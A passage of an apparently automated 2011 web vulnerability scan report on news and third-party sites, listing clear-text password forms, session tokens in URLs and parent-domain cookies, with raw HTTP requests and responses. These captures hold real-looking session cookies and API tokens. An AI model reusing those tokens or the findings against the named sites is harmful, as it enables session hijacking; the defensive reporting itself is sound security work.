Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8; __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 12:28:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 15321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<div id="lEdirectory" class="isVisible">
               <form name="login" method="post" action="http://www.vermontopia.com/members/login.php">
                   
<input type="hidden" name="destiny" value="http://www.vermontopia.com/profile/" />
...[SNIP]...
</label>
       <input type="password" autocomplete="off" name="password" id="password" value="" />
                   <span class="automaticLogin">
...[SNIP]...
3.5. http://www.wcax.com/global/PM/registration.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/PM/registration.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352695263:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis57
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
ntCoent-Length: 36961
Expires: Sat, 09 Apr 2011 12:38:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:38:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: EmailAddress=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: FirstName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: UserName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: REGISTRATION=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: SuppliedProfileFields=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Content-Length: 36961


<html>
<head id="Head1"><title>
   Create Account
</title><link href="mem.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="/global/interface/jq.js" type="text/javasc
...[SNIP]...
<div id="MainDiv">
<form name="form1" method="post" action="UserProfile.aspx?L=104054&amp;function=manageprofile&amp;mode=create&amp;referrer=http%3a%2f%2fwww.wcax.com%2fGlobal%2flink.asp%3fL%3d398823&amp;referrerDomain=www.wcax.com" id="form1" onsubmit="return Validate();">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkwMjU2NDE0NQ9kFgICAw9kFhACAQ8WAh4EVGV4dAXIATxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+CjwhLS0KdmF
...[SNIP]...
<br />
<input id="Password" type="password" maxLength="60" size="32" name="Password" value="" />
</td>
...[SNIP]...
<br />
<input id="VerifyPassword" type="password" maxLength="60" size="32" name="VerifyPassword" value="" />
</td>
...[SNIP]...
4. Session token in URL  previous  next
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:08 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87675

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
<div id="ka_singlesignon_text">Or <a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login">log in using another provider</a>
...[SNIP]...
<div id="ka_singlesignon_image"><a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login"><img src="http://clientapps.kickapps.com/hearst/comments/images/sso_logos.png"/>
...[SNIP]...
4.2. http://nmp.newsgator.com/NGBuzz/buzz.ashx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:23:25 GMT
ETag: 634320806054306710
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=478
Date: Sat, 09 Apr 2011 12:29:45 GMT
Connection: close
Content-Length: 11208

try{var buzzTemplate_216931="{if LoadScript(NGBaseUrl+\"HOST/\"+OrgCode+\"/js/jquery.min.js\", \"window.jQuery != null\") }\n{if location.hostname==\"hosted.newsgator.com\"}\n{eval}\n LoadCSS(\"http:
...[SNIP]...
4.3. https://www.google.com/accounts/Captcha  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.google.com
Path:   /accounts/Captcha

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /accounts/Captcha?ctoken=ecOWC89KIyylmDv-PSxGhtgRFB59uJBi-gg9_wef1O7A3iNHXjWzdFV9AqlKTWXgEXEDOzze2sWjo8VH38xGHw%3AzTcajSXRS-JjUUHMjFOUQA HTTP/1.1
Host: www.google.com
Connection: keep-alive
Referer: https://www.google.com/accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 2930
Date: Sat, 09 Apr 2011 00:21:09 GMT
Expires: Sat, 09 Apr 2011 00:21:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

......JFIF..............6019dfafa6e6e209....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......F....".........
...[SNIP]...
4.4. https://www.google.com/accounts/NewAccount  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.google.com
Path:   /accounts/NewAccount

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Date: Sat, 09 Apr 2011 00:21:06 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 71211

<html><head><title>Google Accounts</title>
<style type="text/css">
body {font-family: arial,sans-serif;}
.body {margin: 0 15px; }

div.errorbox-good {}

div.errorbox-bad {}


...[SNIP]...
<div><img src="https://www.google.com/accounts/Captcha?ctoken=I-sHbDZbzZOycbhqbEy98l41TaMDrVw5gCcE4cfQNTOblKxx6MAFyhfUElK9PMLrk8dDOmi1iNr1qO-oS0lurg%3APQb2M-RWN9gEcfoqN7XOLw" width="200" height="70" alt="Visual verification"></div>
...[SNIP]...
<noscript><a href="https://www.google.com/accounts/Captcha?ctoken=LeWT_hBm_6MxaFBX7MrLgTxjcJ5K3ehKU1A8c5PMkK8fubjtpjcq2fbHnJBJNQiJd9g4kFAvFJC1gtNiBWIk1A%3ANYr2uhZOPE9XSQr3g6x-XA" target="_blank"><img src="https://www.google.com/accounts/accessibility.gif" border="0" style="width: 1em; height: 1.2em;" align="absmiddle" alt="Listen and type the numbers you hear">
...[SNIP]...
4.5. http://www.wptz.com/index.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wptz.com
Path:   /index.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin126
X-Flow: xslt-in-production
Cache-Control: max-age=324
Expires: Sat, 09 Apr 2011 12:35:07 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Content-Length: 154822

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<div class="sectionwidget2">


<script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025" type="text/javascript"></script>
...[SNIP]...
5. Cookie scoped to parent domain  previous  next
There are 155 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

5.1. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_DAN/lists/wcaxweather/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352244311=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352251-30597-14967
X-RateLimit-Limit: 150
ETag: "350bcab9704451c63ab3f21f69a9eb28"-gzip
Last-Modified: Sat, 09 Apr 2011 12:30:51 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02792
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCBJPjovAToHaWQiJTdhYWFkN2QzZGMzMzVk%250ANGIwNGFjZjllZjhmZTA2YTQ5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e2f772c7bb1d7130fafe5220eaad1a5066753ead; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 37156

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56489775208730624","text":"Spring is here to stay! Chance for a few showers late Sunday, then 70s on Monday. Have a great weeke
...[SNIP]...
5.2. http://api.twitter.com/1/WCAX_Dan%20/lists/wcaxnews/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_Dan%20/lists/wcaxnews/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_Dan%20/lists/wcaxnews/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352449219=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en; original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWI5%250AZDY2MTEyNzEzYzI5MWVkOGM5ZDNiMDU4OWUxNGM0--68456826b804732decc9adcd874144bfe8409462

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352456-97362-51984
X-RateLimit-Limit: 150
ETag: "9c56bdc9d348f90ccc8f5b3abd425756"-gzip
Last-Modified: Sat, 09 Apr 2011 12:34:16 GMT
X-RateLimit-Remaining: 60
X-Runtime: 0.03948
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovAToHaWQiJWI5ZDY2MTEyNzEzYzI5%250AMWVkOGM5ZDNiMDU4OWUxNGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--3fca1ebd2ebf0edc779f5abbed3918788126099a; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 33728

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56526851723640833","text":"#vt company goes from roadside stand to multi-million $ biz: http:\/\/www.wcax.com\/global\/story.as
...[SNIP]...
5.3. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?id=CAESEPxOsKR978Hu13ThKmL5OJM&cver=1&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Content-Length: 42
Set-Cookie: t=1302352533150;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: u="aABnAnSVw==AI89bBrQ==AAABLzpClp4=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT

GIF89a.............!.......,........@..D.;
5.4. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=8663496762294337265&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
